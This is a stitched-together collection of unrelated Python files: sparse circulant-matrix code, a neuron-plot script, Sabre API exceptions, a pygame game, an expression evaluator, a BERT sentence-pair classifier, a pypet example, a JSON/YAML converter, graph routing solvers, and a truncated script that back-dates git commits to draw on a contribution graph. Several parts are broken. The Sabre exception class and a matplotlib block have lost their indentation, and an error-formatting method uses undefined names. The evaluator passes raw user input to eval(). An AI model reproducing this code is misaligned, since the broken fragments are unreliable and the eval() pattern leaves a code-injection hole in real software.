        return self.block.count_nonzero()*self.n_blocks
    @property
    def nbytes(self):
        # Memory of the stored block only; the other blocks are implicit.
        return nbytes(self.block)
    def transpose(self, axes=None, copy=False):
        from .chb import chb_matrix
        # Transpose of a circulant vertical-block matrix is a circulant
        # horizontal-block matrix built from the transposed block.
        if axes is None:
            return chb_matrix((self.block.T, self.shift), self.shape[::-1], self.dtype)
        else:
            return super().transpose(axes=axes, copy=copy)
    def tocoo(self, copy=False):
        """
        Slow.
        """
        # Materializes every block row: O(n_blocks * nnz(block)).
        return scipy.sparse.vstack([self.get_block(i) for i in range(self.n_blocks)])
    def tovsb(self, copy=False):
        return vsb_matrix([self.get_block(i) for i in range(self.n_blocks)])
    def get_block(self, i=0):
        # Return block-row i: the stored block with its columns rotated by
        # i*self.shift (modulo the column count).
        if i == 0:
            return self.block
        elif isinstance(self.block, cir_matrix):
            # cir blocks can be rotated by offsetting their diagonals.
            return cir_matrix(
                (self.block.data, self.block.offsets + i*self.shift, self.block.shift),
                self.block.shape,
                self.block.dtype
            )
        # elif isinstance(self.block, cir_matrix):
        #     raise NotImplementedError("TODO")
        else:
            # Generic fallback: rotate the column indices of a COO copy.
            coo = self.block.tocoo()
            return coo_matrix(
                (coo.data, (coo.row, (coo.col + i*self.shift)%coo.shape[1])),
                coo.shape,
                coo.dtype
            )
    def _mul_vector(self, other):
        x = np.ravel(other)
        y = np.zeros(
            self.shape[0], dtype=sputils.upcast_char(self.dtype.char, other.dtype.char)
        )
        if self.shift == 0:
            # All block rows identical: compute once and tile the result.
            y0 = self.block @ x
            for i in range(self.n_blocks):
                y[i*len(y0):(i + 1)*len(y0)] = y0
            return y
        n0 = self.block.shape[0]
        # After `period` block rows the column rotation wraps around, so
        # results repeat with that period.
        period = min(self.n_blocks, abs(np.lcm(self.shift, self.shape[1])//self.shift))
        xr = np.empty_like(x)
        for i in range(period):
            # Equivalent to `xr = np.roll(x, -i*self.shift)``, but faster
            offset = -i*self.shift
            if offset == 0:
                xr[:] = x
            else:
                xr[:offset] = x[-offset:]
                xr[offset:] = x[:-offset]
            y[i*n0:(i + 1)*n0] += self.block @ xr
        # Replicate the first `period` block rows of the result downwards.
        row_period = n0*period
        y0 = y[:row_period]
        for i in range(row_period, self.shape[0], row_period):
            y[i:i + row_period] = y0[:len(y) - i]
        return y
    def _mul_multivector(self, other):
        # Same scheme as _mul_vector, with a 2-D right-hand side.
        y = np.zeros(
            (self.shape[0], other.shape[1]),
            dtype=sputils.upcast_char(self.dtype.char, other.dtype.char)
        )
        if self.shift == 0:
            y0 = self.block @ other
            for i in range(self.n_blocks):
                y[i*len(y0):(i + 1)*len(y0)] = y0
            return y
        n0 = self.block.shape[0]
        period = min(self.n_blocks, abs(np.lcm(self.shift, self.shape[1])//self.shift))
        xr = np.empty_like(other)
        for i in range(period):
            # Equivalent to `xr = np.roll(other, -i*self.shift, axis=0)`, but faster
            offset = -i*self.shift
            if offset == 0:
                xr[:] = other
            else:
                xr[:offset] = other[-offset:]
                xr[offset:] = other[:-offset]
            y[i*n0:(i + 1)*n0] += self.block @ xr
        row_period = n0*period
        y0 = y[:row_period]
        for i in range(row_period, self.shape[0], row_period):
            y[i:i + row_period] = y0[:len(y) - i]
        return y
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Script to visualize neuron firings.
#
import sys, os
import numpy as np
import time
import pickle
import py_reader # reader utility for opendihu *.py files
show_plot = True
# import needed packages from matplotlib
import matplotlib as mpl
if not show_plot:
mpl.use('Agg')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import animation
from matplotlib import cm
from matplotlib.patches import Polygon
import matplotlib.gridspec as gridspec
# get all input data in current directory
filenames = os.listdir("out")

# collect the filenames per neuron type (sorted "out/*.py" paths whose
# name contains the given keyword)
def _matching_files(keyword):
    """Sorted list of out/*.py result files whose name contains `keyword`."""
    return ["out/{}".format(name)
            for name in sorted(n for n in filenames if ".py" in n and keyword in n)]

muscle_spindles_files = _matching_files("muscle_spindles")
golgi_tendon_organs_files = _matching_files("golgi_tendon_organs")
interneurons_files = _matching_files("interneurons")
motoneurons_files = _matching_files("motoneurons")

print("Number of input files: muscle spindles: {}, golgi tendon organs: {}, interneurons: {}, motoneurons: {}".format(
    len(muscle_spindles_files), len(golgi_tendon_organs_files), len(interneurons_files), len(motoneurons_files)))

# load data
muscle_spindles_data = py_reader.load_data(muscle_spindles_files)
golgi_tendon_organs_data = py_reader.load_data(golgi_tendon_organs_files)
interneurons_data = py_reader.load_data(interneurons_files)
motoneurons_data = py_reader.load_data(motoneurons_files)
# create plots
fig,axes = plt.subplots(4,1,figsize=(12,8),sharex=True)

# ---------------------
# plot muscle spindles
component_name_input = "(P)modell/L"
component_name_output = "modell/primary_afferent"
t_values = None
values_output = None
values_input = None

# loop over datasets at different times
for i,dataset in enumerate(muscle_spindles_data):
    # get the data for the current timestep
    data_input = py_reader.get_values(dataset, "parameters", component_name_input)
    data_output = py_reader.get_values(dataset, "algebraics", component_name_output)
    if data_input is None:
        print("No (input) data found for muscle spindles or component '{}' does not exist.\n".format(component_name_input))
    if data_output is None:
        print("No (output) data found for muscle spindles or component '{}' does not exist.\n".format(component_name_output))
    # create arrays the first time
    # NOTE(review): the input array is also sized by len(data_output) —
    # assumes input and output have one value per neuron; confirm.
    if values_output is None:
        values_input = np.zeros((len(data_output), len(muscle_spindles_data)))  # each column is the data for one timestep, for multiple neurons
        values_output = np.zeros((len(data_output), len(muscle_spindles_data)))  # each column is the data for one timestep, for multiple neurons
        t_values = np.zeros((len(muscle_spindles_data)))
    # store values
    values_input[:,i] = data_input
    values_output[:,i] = data_output
    t_values[i] = dataset['currentTime']

# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
    # NOTE(review): `_get_lines.prop_cycler` is private Matplotlib API;
    # used here so the dotted input line shares the solid line's color.
    color = next(axes[0]._get_lines.prop_cycler)['color']
    axes[0].plot(t_values, values_output[i,:], '-', color=color)
    if i == 0:
        # twin y-axis for the input current, created once per subplot
        ax2 = axes[0].twinx()
        ax2.plot(t_values, values_input[i,:], ':', color=color)

# set title and axis labels
axes[0].set_title('Muscle spindles (number: {})'.format(n))
axes[0].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')

# ---------------------
# plot Golgi tendon organs (same pattern as the muscle spindle section)
component_name_input = "(P)membrane/i_Stim"
component_name_output = "membrane/V"
t_values = None
values_input = None
values_output = None

# loop over datasets at different times
for i,dataset in enumerate(golgi_tendon_organs_data):
    # get the data for the current timestep
    data_input = py_reader.get_values(dataset, "parameters", component_name_input)
    data_output = py_reader.get_values(dataset, "solution", component_name_output)
    if data_input is None:
        print("No data found for Golgi tendon organs or component '{}' does not exist.\n".format(component_name_input))
    if data_output is None:
        print("No data found for Golgi tendon organs or component '{}' does not exist.\n".format(component_name_output))
    # create arrays the first time
    if values_output is None:
        values_input = np.zeros((len(data_output), len(golgi_tendon_organs_data)))  # each column is the data for one timestep, for multiple neurons
        values_output = np.zeros((len(data_output), len(golgi_tendon_organs_data)))  # each column is the data for one timestep, for multiple neurons
        t_values = np.zeros((len(golgi_tendon_organs_data)))
    # store values
    values_input[:,i] = data_input
    values_output[:,i] = data_output
    t_values[i] = dataset['currentTime']

# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
    color = next(axes[1]._get_lines.prop_cycler)['color']
    axes[1].plot(t_values, values_output[i,:], '-', color=color)
    if i == 0:
        ax2 = axes[1].twinx()
        ax2.plot(t_values, values_input[i,:], ':', color=color)

# set title and axis labels
axes[1].set_title('Golgi tendon organs (number: {})'.format(n))
axes[1].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')

# ---------------------
# plot interneurons
component_name_input = "(P)membrane/i_Stim"
component_name_output = "membrane/V"
t_values = None
values_output = None
values_input = None

# loop over datasets at different times
for i,dataset in enumerate(interneurons_data):
    # get the data for the current timestep
    data_input = py_reader.get_values(dataset, "parameters", component_name_input)
    data_output = py_reader.get_values(dataset, "solution", component_name_output)
    if data_input is None:
        print("No data found for interneurons or component '{}' does not exist.\n".format(component_name_input))
    if data_output is None:
        print("No data found for interneurons or component '{}' does not exist.\n".format(component_name_output))
    # create arrays the first time
    if values_output is None:
        values_input = np.zeros((len(data_output), len(interneurons_data)))  # each column is the data for one timestep, for multiple neurons
        values_output = np.zeros((len(data_output), len(interneurons_data)))  # each column is the data for one timestep, for multiple neurons
        t_values = np.zeros((len(interneurons_data)))
    # store values
    values_input[:,i] = data_input
    values_output[:,i] = data_output
    t_values[i] = dataset['currentTime']

# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
    color = next(axes[2]._get_lines.prop_cycler)['color']
    axes[2].plot(t_values, values_output[i,:], '-', color=color)
    if i == 0:
        ax2 = axes[2].twinx()
        ax2.plot(t_values, values_input[i,:], ':', color=color)

# set title and axis labels
axes[2].set_title('Interneurons (number: {})'.format(n))
axes[2].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')

# ---------------------
# plot motoneurons
component_name_input = "(P)motor_neuron/drive"
component_name_output = "motor_neuron/V_s"
t_values = None
values_output = None
values_input = None

# loop over datasets at different times
for i,dataset in enumerate(motoneurons_data):
    # get the data for the current timestep
    data_input = py_reader.get_values(dataset, "parameters", component_name_input)
    data_output = py_reader.get_values(dataset, "solution", component_name_output)
    if data_input is None:
        print("No data found for motoneurons or component '{}' does not exist.\n".format(component_name_input))
    if data_output is None:
        print("No data found for motoneurons or component '{}' does not exist.\n".format(component_name_output))
    # create arrays the first time
    if values_output is None:
        values_input = np.zeros((len(data_output), len(motoneurons_data)))  # each column is the data for one timestep, for multiple neurons
        values_output = np.zeros((len(data_output), len(motoneurons_data)))  # each column is the data for one timestep, for multiple neurons
        t_values = np.zeros((len(motoneurons_data)))
    # store values
    values_input[:,i] = data_input
    values_output[:,i] = data_output
    t_values[i] = dataset['currentTime']

# plot lines for all timesteps
# loop over neurons
n = values_output.shape[0]
for i in range(n):
    color = next(axes[3]._get_lines.prop_cycler)['color']
    axes[3].plot(t_values, values_output[i,:], '-', color=color)
    if i == 0:
        ax2 = axes[3].twinx()
        ax2.plot(t_values, values_input[i,:], ':', color=color)

# set title and axis labels
axes[3].set_title('Motor neurons (number: {})'.format(n))
axes[3].set_xlabel('time [ms]')
axes[3].set_ylabel('voltage [mV]\n(solid lines)')
ax2.set_ylabel('input current [uA]\n(dotted lines)')

# show plot window (saved to file first so the figure survives headless runs)
plt.savefig("plot.png")
plt.show()
|
class SabreClientError(Exception):
    """Base class for client-side errors raised before an API request is made."""
    pass

# Authentication requested, but no credentials (client ID, client secret) provided
class NoCredentialsProvided(SabreClientError):
    pass

# Did not request token
class NotAuthorizedError(SabreClientError):
    pass

class UnsupportedMethodError(SabreClientError):
    """Requested method is not supported by the client."""
    pass

class InvalidInputError(SabreClientError):
    """Input failed client-side validation."""
    pass
# Base API Exception
class SabreDevStudioAPIException(Exception):
def __init__(self, e=None):
if isinstance(e, dict):
message = e.get('message')
super(SabreDevStudioAPIException, self).__init__(message)
self.message = message
self.status = e.get('status')
self.error_code = e.get('errorCode')
self.e_type = e.get('type')
self.tstamp = e.get('timeStamp')
elif isinstance(e, str):
self.message = e
else:
super(SabreDevStudioAPIException, self).__init__()
def __unicode__(self):
if self.message and self.status:
str += 'Message:\t' + self.message + '\n'
str += 'Status:\t' + self.status + '\n'
str += 'Error Code:\t' + self.error_code + '\n'
str += 'Type:\t' + self.type + '\n'
str += 'Timestamp:\t' + self.timestamp + '\n'
return str
elif self.message:
return self.message
else:
return "<" + self.__class__.__name__ + ">"
# One subclass per HTTP status code returned by the API.

# 400
class SabreErrorBadRequest(SabreDevStudioAPIException):
    pass

# 401
class SabreErrorUnauthorized(SabreDevStudioAPIException):
    pass

# 403
class SabreErrorForbidden(SabreDevStudioAPIException):
    pass

# 404
class SabreErrorNotFound(SabreDevStudioAPIException):
    pass

# 405 (was mislabeled "# 404")
class SabreErrorMethodNotAllowed(SabreDevStudioAPIException):
    pass

# 406
class SabreErrorNotAcceptable(SabreDevStudioAPIException):
    pass

# 429
class SabreErrorRateLimited(SabreDevStudioAPIException):
    pass

# 500
class SabreInternalServerError(SabreDevStudioAPIException):
    pass

# 503
class SabreErrorServiceUnavailable(SabreDevStudioAPIException):
    pass

# 504
class SabreErrorGatewayTimeout(SabreDevStudioAPIException):
    pass

# No specific HTTP status: request made without prior authentication
class SabreErrorUnauthenticated(SabreDevStudioAPIException):
    pass
import pygame as p
from asset_loader import AssetLoader
from enemy import Enemy
from player import Player
class GameState():
    """Main game loop state: window, player, enemy, score and music."""

    WIN_WIDTH = 500
    WIN_HEIGHT = 480

    def __init__(self):
        p.init()
        p.display.set_caption("First Platformer Game")
        self.win = p.display.set_mode((self.WIN_WIDTH, self.WIN_HEIGHT))
        self.player = Player()
        self.enemy = Enemy()
        asset_loader = AssetLoader()
        self.bg = asset_loader.load_background()
        self.music = asset_loader.load_music()
        self.music.play(-1)  # -1: loop the background music forever
        self.score = 0
        self.clock = p.time.Clock()

    def update(self):
        """Run the main loop until the window is closed."""
        run = True
        while run:
            self.win.blit(self.bg, (0, 0))
            self.clock.tick(60)  # cap at 60 FPS
            for event in p.event.get():
                if event.type == p.QUIT:
                    run = False
            self.player.update(self.win)
            self.enemy.update(self.win)
            self._check_collision()
            self._display_score()
            p.display.update()

    def _check_collision(self):
        """
        1. check collision between enemy vs player
        2. check collision between enemy vs player bullets
        """
        enemy_collided = self.player.hitbox.collide(self.enemy.hitbox)
        if enemy_collided:
            self.player.health -= 1
            print('player vs enemy hit')  # reduce health of the player
        bullets = self.player.bullets
        # BUG FIX: iterate over a snapshot. Removing from the list being
        # iterated silently skips the element right after each removed
        # bullet, so simultaneous hits could be missed.
        for bullet in list(bullets):
            bullet_hit = bullet.hitbox.collide(self.enemy.hitbox)
            if bullet_hit:
                bullets.remove(bullet)
                self.score += 1
                self.enemy.health -= 1
                print('bullet hit vs enemy')

    def _display_score(self):
        font = p.font.SysFont('comicsans', 30, True)
        text = font.render('Score: ' + str(self.score), 1, (0, 0, 0))
        self.win.blit(text, (390, 10))


if __name__ == '__main__':
    game = GameState()
    game.update()
|
import re
exp = input().lstrip('0')
# Drop leading zeros from any number that follows an operator
# ("5+007" -> "5+7"); integer literals with leading zeros are a
# SyntaxError for Python 3's eval().
refined_exp = re.sub(r'\D0+\d', lambda x: x.group(0)[:-1].replace('0', '') + x.group(0)[-1], exp)
terms = refined_exp.split('-')
v = []
if(len(terms) == 1):
    # No subtraction at all: evaluate directly.
    print(eval(terms[0]))
else:
    # NOTE(review): splitting on '-' makes each minus subtract the value of
    # the ENTIRE following term, e.g. '1-2+3' evaluates as 1 - (2+3) = -4.
    # Presumably the exercise's intended semantics — confirm.
    for i in terms[1:]:
        v.append(eval(i))
    res = eval(terms[0]) - sum(v)
    print(res)
|
#! -*- coding:utf-8 -*-
# 语义相似度任务:数据集xnli, 从train中切分了valid
# loss: concat后走3分类,CrossEntropyLoss
from bert4torch.tokenizers import Tokenizer
from bert4torch.models import build_transformer_model, BaseModel
from bert4torch.snippets import sequence_padding, Callback, ListDataset
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
# Tokenization / batching hyper-parameters.
maxlen = 256
batch_size = 12
# Pretrained Google BERT-base Chinese checkpoint files.
config_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/bert_config.json'
checkpoint_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/pytorch_model.bin'
dict_path = 'F:/Projects/pretrain_ckpt/bert/[google_tf_base]--chinese_L-12_H-768_A-12/vocab.txt'
# XNLI three-way classification labels.
label2id = {"contradictory": 0, "entailment": 1, "neutral": 2}
device = 'cuda' if torch.cuda.is_available() else 'cpu'

# Build the tokenizer
tokenizer = Tokenizer(dict_path, do_lower_case=True)
def collate_fn(batch):
    """Tokenize sentence pairs and pad them into batch tensors.

    Returns ((token_ids_1, token_ids_2), labels) with labels flattened
    to a 1-D tensor for CrossEntropyLoss.
    """
    ids_a, ids_b, labels = [], [], []
    for text1, text2, label in batch:
        ids_a.append(tokenizer.encode(text1, maxlen=maxlen)[0])
        ids_b.append(tokenizer.encode(text2, maxlen=maxlen)[0])
        labels.append([label])
    ids_a = torch.tensor(sequence_padding(ids_a), dtype=torch.long, device=device)
    ids_b = torch.tensor(sequence_padding(ids_b), dtype=torch.long, device=device)
    labels = torch.tensor(labels, dtype=torch.long, device=device)
    return (ids_a, ids_b), labels.flatten()
# Dataset loading
def get_data(filename):
    """Read a tab-separated XNLI file and split it into train/dev.

    Every 100th row goes into the dev split; the header row is skipped.
    """
    train_data, dev_data = [], []
    with open(filename, encoding='utf-8') as f:
        for row, line in enumerate(f):
            if row == 0:
                # skip the header line
                continue
            text1, text2, label = line.strip().split('\t')
            bucket = dev_data if row % 100 == 0 else train_data
            bucket.append((text1, text2, label2id[label]))
    return train_data, dev_data
train_data, dev_data = get_data('F:/Projects/data/corpus/sentence_embedding/XNLI-MT-1.0/multinli/multinli.train.zh.tsv')
# Shuffle only the training split; collate_fn tokenizes and pads each batch.
train_dataloader = DataLoader(ListDataset(data=train_data), batch_size=batch_size, shuffle=True, collate_fn=collate_fn)
valid_dataloader = DataLoader(ListDataset(data=dev_data), batch_size=batch_size, collate_fn=collate_fn)
# Model structure on top of BERT (SBERT-style twin-tower classifier)
class Model(BaseModel):
    """Twin-tower BERT encoder with a 3-way classification head.

    Both sentences are encoded by the same BERT, pooled into sentence
    vectors, the vectors are concatenated (optionally with |a-b| and a*b)
    and fed through a linear layer.
    """
    def __init__(self, pool_method='mean', concatenation_sent_rep=True, concatenation_sent_difference=True, concatenation_sent_multiplication=False):
        super().__init__()
        self.bert, self.config = build_transformer_model(config_path=config_path, checkpoint_path=checkpoint_path, with_pool=True, return_model_config=True, segment_vocab_size=0)
        self.pool_method = pool_method
        self.concatenation_sent_rep = concatenation_sent_rep
        self.concatenation_sent_difference = concatenation_sent_difference
        self.concatenation_sent_multiplication = concatenation_sent_multiplication
        # Classifier input width depends on which features are concatenated.
        hidden_unit = 0
        hidden_unit += 768*2 if self.concatenation_sent_rep else 0
        hidden_unit += 768 if self.concatenation_sent_difference else 0
        hidden_unit += 768 if self.concatenation_sent_multiplication else 0
        self.fc = nn.Linear(hidden_unit, len(label2id))

    def forward(self, token1_ids, token2_ids):
        # Token id 0 is padding, so gt(0) doubles as the attention mask.
        hidden_state1, pool_cls1 = self.bert([token1_ids])
        rep_a = self.get_pool_emb(hidden_state1, pool_cls1, attention_mask=token1_ids.gt(0).long())
        hidden_state2, pool_cls2 = self.bert([token2_ids])
        rep_b = self.get_pool_emb(hidden_state2, pool_cls2, attention_mask=token2_ids.gt(0).long())
        vectors_concat = []
        if self.concatenation_sent_rep:
            vectors_concat.append(rep_a)
            vectors_concat.append(rep_b)
        if self.concatenation_sent_difference:
            vectors_concat.append(torch.abs(rep_a - rep_b))
        if self.concatenation_sent_multiplication:
            vectors_concat.append(rep_a * rep_b)
        vectors_concat = torch.cat(vectors_concat, dim=1)
        return self.fc(vectors_concat)

    def get_pool_emb(self, hidden_state, pool_cls, attention_mask):
        """Pool per-token embeddings into one sentence vector."""
        if self.pool_method == 'cls':
            return pool_cls
        elif self.pool_method == 'mean':
            # Masked mean over the sequence dimension.
            hidden_state = torch.sum(hidden_state * attention_mask[:, :, None], dim=1)
            attention_mask = torch.sum(attention_mask, dim=1)[:, None]
            return hidden_state / attention_mask
        elif self.pool_method == 'max':
            seq_state = hidden_state * attention_mask[:, :, None]
            # BUG FIX: torch.max(..., dim=1) returns a (values, indices)
            # namedtuple; the embedding is the `values` tensor, not the tuple.
            return torch.max(seq_state, dim=1).values
        else:
            raise ValueError('pool_method illegal')
model = Model().to(device)

# Configure the loss and optimizer; both can be customized.
model.compile(
    loss=nn.CrossEntropyLoss(),
    optimizer=optim.Adam(model.parameters(), lr=2e-5),  # use a sufficiently small learning rate
)
# Evaluation helper
def evaluate(data):
    """Return the classification accuracy of `model` over a dataloader.

    argmax on the raw logits gives the same labels as on softmax output,
    since softmax is monotonic.
    """
    correct, seen = 0.0, 0.0
    for inputs, labels in data:
        preds = model.predict(inputs).argmax(axis=1)
        seen += len(labels)
        correct += (labels == preds).sum().item()
    return correct / seen
class Evaluator(Callback):
    """Track the best validation accuracy at the end of every epoch."""

    def __init__(self):
        self.best_val_acc = 0.

    def on_epoch_end(self, global_step, epoch, logs=None):
        val_acc = evaluate(valid_dataloader)
        if val_acc > self.best_val_acc:
            self.best_val_acc = val_acc
            # checkpointing on improvement is disabled:
            # model.save_weights('best_model.pt')
        print(f'val_acc: {val_acc:.5f}, best_val_acc: {self.best_val_acc:.5f}\n')
if __name__ == '__main__':
    # Train: 20 epochs of 300 steps each, evaluating after every epoch.
    evaluator = Evaluator()
    model.fit(train_dataloader,
              epochs=20,
              steps_per_epoch=300,
              callbacks=[evaluator]
              )
else:
    # When imported, load the previously saved best checkpoint instead.
    model.load_weights('best_model.pt')
|
"""Exploring more than 20000 runs may slow down *pypet*.
HDF5 has problems handling nodes with more than 10000 children.
To overcome this problem, simply group your runs into buckets or sets
using the `$set` wildcard.
"""
__author__ = 'Robert Meyer'
import os # To allow file paths working under Windows and Linux
from pypet import Environment
from pypet.utils.explore import cartesian_product
def multiply(traj):
    """Example of a sophisticated simulation that involves multiplying two values."""
    product = traj.x * traj.y
    # Group results into buckets of 1000 runs via the `$set` wildcard so no
    # HDF5 node ends up with too many children.
    traj.f_add_result('$set.$.z', product,
                      comment='Result of our simulation sorted into buckets of 1000 runs each!')
def main():
    """Run the many-runs example: explore 2500 parameter combinations."""
    # Create an environment that handles running
    filename = os.path.join('hdf5','example_18.hdf5')
    env = Environment(trajectory='Multiplication',
                      filename=filename,
                      file_title='Example_18_Many_Runs',
                      overwrite_file=True,
                      comment='Contains many runs',
                      multiproc=True,
                      use_pool=True,
                      freeze_input=True,
                      ncores=2,
                      wrap_mode='QUEUE')
    # The environment has created a trajectory container for us
    traj = env.trajectory
    # Add both parameters
    traj.f_add_parameter('x', 1, comment='I am the first dimension!')
    traj.f_add_parameter('y', 1, comment='I am the second dimension!')
    # Explore the parameters with a cartesian product, yielding 2500 runs
    traj.f_explore(cartesian_product({'x': range(50), 'y': range(50)}))
    # Run the simulation
    env.run(multiply)
    # Disable logging
    env.disable_logging()
    # turn auto loading on, since results have not been loaded, yet
    traj.v_auto_load = True
    # Use the `v_idx` functionality
    traj.v_idx = 2042
    print('The result of run %d is: ' % traj.v_idx)
    # Now we can rely on the wildcards
    print(traj.res.crunset.crun.z)
    traj.v_idx = -1
    # Or we can use the shortcuts `rts_X` (run to set) and `r_X` to get particular results
    print('The result of run %d is: ' % 2044)
    print(traj.res.rts_2044.r_2044.z)

if __name__ == '__main__':
    main()
import json
import yaml
# JSON -> YAML
with open('input.json') as js:
    data = json.load(js)
with open('output.yaml', 'w') as yml:
    yaml.dump(data, yml, default_flow_style=False, allow_unicode=True)

# YAML -> JSON
with open('input.yml') as yml:
    # safe_load: plain yaml.load() without an explicit Loader is deprecated
    # and can construct arbitrary Python objects from untrusted input.
    data = yaml.safe_load(yml)
with open('output.json', 'w') as js:
    json.dump(data, js)
|
from collections import defaultdict
import lib
from clustering import *
import numpy as np
def solve_13(graph, houses, infra, speed=40):
    """Pick the infrastructure object minimizing the total path length to all houses.

    Returns a dict with the winning object's id, the summed path length
    and the list of routes.  Raises ValueError if `infra` is empty
    (min() over an empty mapping), as before.
    """
    # Plain dicts: the original used defaultdict() without a factory,
    # which behaves exactly like dict but suggests otherwise.
    total_length = {}  # obj id -> summed shortest-path length
    obj_routes = {}    # obj id -> list of routes
    for obj in infra:
        routes = lib.getFromSingleToManyPaths(graph, obj, houses, speed)
        total_length[obj] = sum(route['length'] for route in routes.values())
        obj_routes[obj] = [route['route'] for route in routes.values()]
    best = min(total_length, key=total_length.get)
    return {
        'id': best,
        'length': total_length[best],
        'routes': obj_routes[best]
    }
def solve_14(graph, houses, infra, speed=40):
    """Pick the infrastructure node whose routing tree to all houses has minimal weight.

    Returns a dict with the winning node id, the tree weight, and the tree itself.
    """
    # Plain dicts: the original defaultdict() had no default_factory, so it
    # acted exactly like dict. The original also summed per-route lengths into
    # a dict that was never read; that dead computation is dropped.
    tree_weight = {}
    tree_by_obj = {}
    for obj in infra:
        paths = lib.getFromSingleToManyPaths(graph, obj, houses, speed)
        tree = lib.routes_to_tree(graph, [p['route'] for p in paths.values()])
        tree_by_obj[obj] = tree
        tree_weight[obj] = tree['weight']
    best = min(tree_weight, key=tree_weight.get)
    return {
        'id': best,
        'weight': tree_weight[best],
        'tree': tree_by_obj[best]
    }
def solve_21(graph, houses, infra, speed=40):
    """Route a single infrastructure node to every house and summarise the result."""
    paths = lib.getFromSingleToManyPaths(graph, infra, houses, speed)
    total_length = sum(p['length'] for p in paths.values())
    tree = lib.routes_to_tree(graph, [p['route'] for p in paths.values()])
    print(f"infra: {infra}, paths len= {total_length}, tree weight= {tree['weight']}")
    return {
        'id': infra,
        'pathsLengthSum': total_length,
        'treeLength': tree['weight'],
        'treeEdges': tree['edges']  # set of edges (id1, id2)
    }
def solve_22_24(graph, houses, infra, k, speed=40):
    """Cluster the houses into *k* groups, route each cluster from its centroid,
    and route the infrastructure node to all centroids."""
    # 2.2) pairwise distance matrix over house coordinates
    coords = np.array([(graph.nodes[h]['y'], graph.nodes[h]['x']) for h in houses])
    dist_matrix = np.array([[get_distance(a[0], a[1], b[0], b[1]) for b in coords]
                            for a in coords])
    plot_dendrogram(dist_matrix, houses, truncate_mode='level')
    model = get_clusters(dist_matrix, k=k)

    centroids, trees, lengths = [], [], []
    for c in range(k):
        # 2.3 a) pick the centroid house of this cluster
        mask = model.labels_ == c
        cluster_coords = coords[mask]
        cluster = np.array(houses)[mask]
        centroids.append(cluster[get_centroid(cluster_coords)])
        # 2.3 c,d) routes from the centroid to every house of the cluster
        paths = lib.getFromSingleToManyPaths(graph, centroids[-1], cluster, speed)
        lengths.append(sum(p['length'] for p in paths.values()))
        trees.append(lib.routes_to_tree(graph, [p['route'] for p in paths.values()]))

    # 2.3 b) routes from the infrastructure node to every centroid
    paths = lib.getFromSingleToManyPaths(graph, infra, centroids, speed)
    paths_length = sum(p['length'] for p in paths.values())
    tree = lib.routes_to_tree(graph, [p['route'] for p in paths.values()])

    # JSON-friendly copies of the cluster trees (edge ids as plain ints)
    int_trees = [{
        "edges": [[int(e[0]), int(e[1])] for e in t['edges']],
        "weight": t["weight"]
    } for t in trees]
    return {
        'centroidTree': tree,  # 2.3b
        'centroidLength': paths_length,  # 2.3b (suddenly need)
        'clusterTrees': int_trees,  # 2.3cd
        'clusterLengths': lengths,  # 2.3cd
        'centroids': list(map(int, centroids))  # 2.3a
    }
|
import datetime
import os
from datetime import date
from pathlib import Path
from typing import List, Tuple
import numpy as np
from fire import Fire
from git import Repo, Actor
from alphabet_matrix import word_matrix, week_count_for_group
def create_repo(repo_dir):
    # type: (Path) -> Repo
    """Create (if needed) and initialise a git repository at *repo_dir*.

    Side effects: changes the process working directory to *repo_dir*.
    """
    existed = repo_dir.exists()
    # Unconditional mkdir with parents/exist_ok replaces the previous
    # exists()-then-mkdir pair, which was a check-then-act race.
    repo_dir.mkdir(parents=True, exist_ok=True)
    os.chdir(str(repo_dir))
    # Repo.init is idempotent for an existing repository.
    repo = Repo.init(str(repo_dir))
    if not existed:
        # Only announce creation when the directory was actually new;
        # the message used to print even for pre-existing repos.
        print('Create new repo under {}'.format(repo_dir))
    return repo
def create_commit(repo, commit_filename, name, email, commit_date):
    # type: (Repo, str, str, str, date) -> None
    """Append two bytes to *commit_filename* and commit it, back-dated to *commit_date*."""
    # The `with` block closes the file; the explicit fw.close() that used to
    # follow was redundant.
    with open(commit_filename, 'a') as fw:
        fw.write('dd')
    # git honours these environment variables when creating the commit object,
    # which lets us place the commit anywhere on the contribution graph.
    action_date = commit_date.strftime("%Y-%m-%dT%H:%M:%S")
    os.environ["GIT_AUTHOR_DATE"] = action_date
    os.environ["GIT_COMMITTER_DATE"] = action_date
    repo.git.add(commit_filename)
    actor = Actor(name, email=email)
    repo.index.commit("commit", author=actor)
def week_for_group(word_group):
    # type: (List[str]) -> int
    """Return the starting week number for *word_group*, counted back from week 26
    by half the group's rendered width in weeks."""
    return 26 - week_count_for_group(word_group) // 2
def group_by_size(words, max_per_group=50):
    # type: (List[str], int) -> List[List[str]]
    """Greedily pack *words* into groups whose rendered week count stays within
    *max_per_group*.

    A word that would push the current group over the limit starts a new group.
    """
    groups = []  # type: List[List[str]]
    current_group = []  # type: List[str]
    for word in words:
        group_size = week_count_for_group(current_group + [word])
        if group_size > max_per_group:
            # BUG FIX: only flush a non-empty group. Previously, if the very
            # first word alone exceeded the limit, an empty group was appended.
            if current_group:
                groups.append(current_group)
            current_group = [word]
        else:
            current_group.append(word)
    if current_group:
        groups.append(current_group)
    return groups
def date_from_week_number(year, week_number):
    """Return the datetime of the Sunday in the given %W-style week of *year*."""
    # %W counts Monday-started weeks; day-of-week 0 selects the Sunday.
    return datetime.datetime.strptime(
        '{}-W{}-0'.format(year, week_number), "%Y-W%W-%w")
def create_named_commits(repo_dir, words, start_year, name, email, commit_range=(6, 10)):
    # type: (Path, List[str], int, str, str, Tuple[int, int]) -> None
    """Paint *words* onto the contribution graph, one word group per year.

    For every lit cell of the rendered word matrix, a random number of commits
    (drawn from commit_range, upper bound exclusive) is created on the
    corresponding day.
    """
    repo = create_repo(Path(repo_dir))
